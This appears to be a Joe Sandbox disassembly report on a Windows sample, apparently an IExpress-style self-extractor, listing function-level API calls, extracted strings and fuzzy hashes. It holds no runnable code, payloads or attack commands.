                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
                                • String ID:
                                • API String ID: 2995914023-0
                                • Opcode ID: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
                                • Instruction ID: 721265afd42de686375d94603b9116ce38cb4c14108c7d7785403eb926f6fcd2
                                • Opcode Fuzzy Hash: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
                                • Instruction Fuzzy Hash: 9B511B3190CE4386F760AB65F868375A2A2BF487A4FD60535D94D82295FF3CE449EF20
                                APIs
                                  • Part of subcall function 00007FF71D1D5050: FindResourceA.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D5078
                                  • Part of subcall function 00007FF71D1D5050: SizeofResource.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D5089
                                  • Part of subcall function 00007FF71D1D5050: FindResourceA.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D50AF
                                  • Part of subcall function 00007FF71D1D5050: LoadResource.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D50C0
                                  • Part of subcall function 00007FF71D1D5050: LockResource.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D50CF
                                  • Part of subcall function 00007FF71D1D5050: memcpy_s.MSVCRT ref: 00007FF71D1D50EE
                                  • Part of subcall function 00007FF71D1D5050: FreeResource.KERNEL32(?,?,00000000,00007FF71D1D2E43), ref: 00007FF71D1D50FD
                                • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF71D1D3123), ref: 00007FF71D1D60C9
                                • LocalFree.KERNEL32 ref: 00007FF71D1D6142
                                  • Part of subcall function 00007FF71D1D4DCC: LoadStringA.USER32 ref: 00007FF71D1D4E60
                                  • Part of subcall function 00007FF71D1D4DCC: MessageBoxA.USER32 ref: 00007FF71D1D4EA0
                                  • Part of subcall function 00007FF71D1D7700: GetLastError.KERNEL32 ref: 00007FF71D1D7704
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                • String ID: $<None>$UPROMPT
                                • API String ID: 957408736-2569542085
                                • Opcode ID: 3c89efd78b919c53ae921da62a7823d40fc529b0e6928f9f5a66cf62d4f2101d
                                • Instruction ID: a2fc94be1e469f1f6ec259e53c97f9d127d1515ad2021f60d7805b8acaad9571
                                • Opcode Fuzzy Hash: 3c89efd78b919c53ae921da62a7823d40fc529b0e6928f9f5a66cf62d4f2101d
                                • Instruction Fuzzy Hash: AB316171A0CE4387F7206B20B57877AF662EB99764F824534DA0E02695EF7DD008DE10
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: CreateFile$lstrcmp
                                • String ID: *MEMCAB
                                • API String ID: 1301100335-3211172518
                                • Opcode ID: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
                                • Instruction ID: a7260fe176bfbc008901e4f8dc6ae3d1d69a3c0051917cd97075a8259040333d
                                • Opcode Fuzzy Hash: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
                                • Instruction Fuzzy Hash: 8E61B862A0CF4386F7619B15B498379BA92E746B74F865335CA6D027C0EF7CF4099E20
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: FileTime$AttributesDateItemLocalText
                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                • API String ID: 851750970-388467436
                                • Opcode ID: 94d827d004676d0e23b6a3eaf0944199c835ba76f01473357c705151827b719a
                                • Instruction ID: a4b7d2020416610fa72ea320c1bed75ac4a792cfd6f2833b9652d22f9a178090
                                • Opcode Fuzzy Hash: 94d827d004676d0e23b6a3eaf0944199c835ba76f01473357c705151827b719a
                                • Instruction Fuzzy Hash: 5D51A422A1CE5381FA50AB15B468179A7A0FB4ABB0FD64131DA4E43294EF3CF549DB60
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: AllocLocal
                                • String ID: TMP4351$.TMP
                                • API String ID: 3494564517-2619824408
                                • Opcode ID: 115a3f27e39781d027e0477db835a776448aec340d541b983af64270222d4fc0
                                • Instruction ID: 05ccae59e135fce1e35e0640654c181291e06b3e13d0f37b31f8838b5a9c11f1
                                • Opcode Fuzzy Hash: 115a3f27e39781d027e0477db835a776448aec340d541b983af64270222d4fc0
                                • Instruction Fuzzy Hash: 63318F21A0CE8287F710AB25B42837AFA51EB85BB4F854334DA6E027D5EF3CD4099F10
                                APIs
                                  • Part of subcall function 00007FF71D1D3B40: MsgWaitForMultipleObjects.USER32(?,?,?,?,?,?,?,?,?,00000001,00007FF71D1D3A09), ref: 00007FF71D1D3B64
                                  • Part of subcall function 00007FF71D1D3B40: PeekMessageA.USER32 ref: 00007FF71D1D3B89
                                  • Part of subcall function 00007FF71D1D3B40: PeekMessageA.USER32 ref: 00007FF71D1D3BCD
                                • WriteFile.KERNELBASE ref: 00007FF71D1D56E4
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                • String ID:
                                • API String ID: 1084409-0
                                • Opcode ID: 2a76a806002c51afc5401a5001571f8213dae6f688e945ba72fdbdbea0bf890e
                                • Instruction ID: 4f21d72a2266ed982118a360f97abb1505463a56dbcd56b4fdefb5945bcc0368
                                • Opcode Fuzzy Hash: 2a76a806002c51afc5401a5001571f8213dae6f688e945ba72fdbdbea0bf890e
                                • Instruction Fuzzy Hash: 02217F21A0CE4386F7109F15F868735E7A1BB857A8FE58234D95C066A4EF3CE409DF10
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Resource$AttributesFile$DialogFindFreeIndirectLoadParam
                                • String ID:
                                • API String ID: 2018477427-0
                                • Opcode ID: ded777603aae7cf846a654b588ac2905db21abed33c2a04ac96d39e62aa9a68d
                                • Instruction ID: 11488fc54951e7c01a762cef7f2f5f2cd67498d8c2c52b9a6428249bdd639627
                                • Opcode Fuzzy Hash: ded777603aae7cf846a654b588ac2905db21abed33c2a04ac96d39e62aa9a68d
                                • Instruction Fuzzy Hash: 4211913190CE4382F6506B14B5AC379E7A1EB46768FDA4230C95D066A8EF7DF44CDB60
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: CharPrev
                                • String ID:
                                • API String ID: 122130370-0
                                • Opcode ID: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
                                • Instruction ID: 8fce60fb342fa7ae3cd40e1ddd43a0fc2c36e35eccc03af59614c75f0cea27cb
                                • Opcode Fuzzy Hash: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
                                • Instruction Fuzzy Hash: FC012B1190CFD38AFB016F11B444369FA50A706BF0F995270DB6A077C5DB2CD445DB10
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: CloseHandle
                                • String ID:
                                • API String ID: 2962429428-0
                                • Opcode ID: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
                                • Instruction ID: f1c7e25f356aedea6595fcb0252b939ad81895f6b541117822d209f84c6d9b32
                                • Opcode Fuzzy Hash: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
                                • Instruction Fuzzy Hash: 0CF0623160CF82C2FB185F65F594178B660EB49B68F954239DA2B46684DF38D484DB20
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Window$DialogItem$DesktopEnableLoadMessageSendStringText
                                • String ID: $C:\Users\user\AppData\Local\Temp\IXP000.TMP\$horseradish
                                • API String ID: 3530494346-1203528024
                                • Opcode ID: a08a017480455ad58ed40beb3e76922a0008dbd9e9d8db7458c61f95b230d354
                                • Instruction ID: 7882e0acce7b3f115dc3396af10271faba91e5ad927eba61dd05e9ae775a0fab
                                • Opcode Fuzzy Hash: a08a017480455ad58ed40beb3e76922a0008dbd9e9d8db7458c61f95b230d354
                                • Instruction Fuzzy Hash: A8718871A0CE4386F750AB25B428379EB52FB857A5FD64230CA4D02695EF3CE50DAF20
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                • String ID: CheckTokenMembership$advapi32.dll
                                • API String ID: 4204503880-1888249752
                                • Opcode ID: aca234308d6c2b9a7267944faa7f1f83278d608330c87f71542cc3174e944061
                                • Instruction ID: 5a97497064be90b0a42bb327cd01313f134db484853830d0e772edd3d6e34ef1
                                • Opcode Fuzzy Hash: aca234308d6c2b9a7267944faa7f1f83278d608330c87f71542cc3174e944061
                                • Instruction Fuzzy Hash: B1313C3660CF468AE6109F16F4541AABBA1FB89B60F865125DE4D43714EF3CE049CF50
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: ProcessToken$AdjustCloseCurrentExitHandleLookupOpenPrivilegePrivilegesValueWindows
                                • String ID: SeShutdownPrivilege
                                • API String ID: 2829607268-3733053543
                                • Opcode ID: 4521cc09d256cc9c0a3583f069d9fa5dc9083d0cfa193007e767185542f0c5c5
                                • Instruction ID: 4a66a9cd51d175364ecfaa1838f4959ac11e7059f7e1542230e37bc3d09903dc
                                • Opcode Fuzzy Hash: 4521cc09d256cc9c0a3583f069d9fa5dc9083d0cfa193007e767185542f0c5c5
                                • Instruction Fuzzy Hash: 8921A272A1CE4386F7509B20F06837AFA62FB89765F819235E64E02654EF3CD048DF10
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                • String ID:
                                • API String ID: 4104442557-0
                                • Opcode ID: b417f0ca43b0f1a675a55b1394a59fc23cd165e7830d58b26484a22ad4f1a579
                                • Instruction ID: 971af2b05c84be499145063f4246f5cf86398f8222b5c9dd86534ef201ccf63a
                                • Opcode Fuzzy Hash: b417f0ca43b0f1a675a55b1394a59fc23cd165e7830d58b26484a22ad4f1a579
                                • Instruction Fuzzy Hash: 69115126608F428AEB00EF61F8582A873A5FB09768F810A30EA5D47755EF7CD168D750
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled
                                • String ID:
                                • API String ID: 3192549508-0
                                • Opcode ID: 5301e7076f5ef957a13bc7f6d002c3f7f3b9a25b2f64b703cbde4610621febb0
                                • Instruction ID: 21105631e8e006c9a8ef077e681e4e70ec6d3ca1843ecd351a8d7454bc17531e
                                • Opcode Fuzzy Hash: 5301e7076f5ef957a13bc7f6d002c3f7f3b9a25b2f64b703cbde4610621febb0
                                • Instruction Fuzzy Hash: 76B09210E69C43C1E604BB21ACA906053A1BB58324FC20870C00D80121EF1CE19EEB20
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                • String ID: "$:$@$RegServer
                                • API String ID: 1203814774-4077547207
                                • Opcode ID: 6e530289b7fe5922f9cfda438616e34a1a36475502b4d42f4ffce2e3ac89d0b1
                                • Instruction ID: 311b3f2864578b132dbbc27085e3bba78a7ff17935109ac9020e11c02699c8f0
                                • Opcode Fuzzy Hash: 6e530289b7fe5922f9cfda438616e34a1a36475502b4d42f4ffce2e3ac89d0b1
                                • Instruction Fuzzy Hash: A702C051A0CEC345FE60AB24742C279EBA1AF46760FD60631D95F02695FF2DE40AEF20
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: EventItemMessageSendThreadWindow$CreateDesktopDialogResetTerminateText
                                • String ID: $horseradish
                                • API String ID: 2654313074-507738753
                                • Opcode ID: d29d643aeea416fab1e010946dc15223199e691555f5366313ee3528c2360453
                                • Instruction ID: 2fad7b33e5dcbca17e9ab1b84d9fc9303117b5b3013bc7c8c5a881ab0fc7d241
                                • Opcode Fuzzy Hash: d29d643aeea416fab1e010946dc15223199e691555f5366313ee3528c2360453
                                • Instruction Fuzzy Hash: 36514131A0CE4386F7106B11F96C279EA62EB89B75F969231D91D02794EF3CE0499F20
                                APIs
                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71D1D35E3), ref: 00007FF71D1D4A86
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71D1D35E3), ref: 00007FF71D1D4AAA
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71D1D35E3), ref: 00007FF71D1D4ACA
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71D1D35E3), ref: 00007FF71D1D4AEC
                                • GetTempPathA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71D1D35E3), ref: 00007FF71D1D4B1B
                                • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71D1D35E3), ref: 00007FF71D1D4B3A
                                • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71D1D35E3), ref: 00007FF71D1D4B54
                                • FreeLibrary.KERNEL32 ref: 00007FF71D1D4BF1
                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71D1D35E3), ref: 00007FF71D1D4C0D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                • API String ID: 1865808269-1731843650
                                • Opcode ID: 2a5ea4b490894db445cb84de2448d12f1af4c9272f9454c89187ac1fef39355e
                                • Instruction ID: 07a7fd4f3963bb3575dd224090649ce20ea3381007205622fdcd48a026f9d8a3
                                • Opcode Fuzzy Hash: 2a5ea4b490894db445cb84de2448d12f1af4c9272f9454c89187ac1fef39355e
                                • Instruction Fuzzy Hash: 52517021A0DE4386F700AB11B4681B9BB92FB8ABA1F854530DD4E03754EF3CE448DB20
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Local$AllocMessage$EnumLanguagesResource$BeepCharCloseFreeLoadMetricsNextOpenQueryStringSystemValueVersion
                                • String ID: horseradish$rce.
                                • API String ID: 2929476258-407637275
                                • Opcode ID: abe435584ecd5f6fe87ce2b456f1e06dda66ab3f9fb72e6f330788004a039cce
                                • Instruction ID: 255fc15913c5fc6e7516bd3860e642be8c3180eef708264c4009e43dc034e49a
                                • Opcode Fuzzy Hash: abe435584ecd5f6fe87ce2b456f1e06dda66ab3f9fb72e6f330788004a039cce
                                • Instruction Fuzzy Hash: E1619221E0CFC386FA11AB65B4283B5A791AB597B4F865230DE4D03395EF3CE549DB20
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540465362.00007FF71D1DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540482585.00007FF71D1DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ff71d1d0000_SecuriteInfo.jbxd
                                Similarity
                                • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                • API String ID: 2659952014-2428544900
                                • Opcode ID: 3b652cf53a0166bf7c173558fb1758d4a4d77de799b7ad200d32d7da73422a7a
                                • Instruction ID: 19e2994a24b76817563df72c08f74ed5ea1992e2cfa757c87d9b4ed65efb4936
                                • Opcode Fuzzy Hash: 3b652cf53a0166bf7c173558fb1758d4a4d77de799b7ad200d32d7da73422a7a
                                • Instruction Fuzzy Hash: 7E51777660CE8286FB10AB11F4682FAB7A1FB89BA0F955131DA5E03754EF3CD449DB10
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2540427139.00007FF71D1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71D1D0000, based on PE: true
                                • Associated: 00000000.00000002.2540410092.00007FF71D1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2540449634.00007FF71D1D9000.00000002.00000001.01000000.00000003.sdmpDownload File
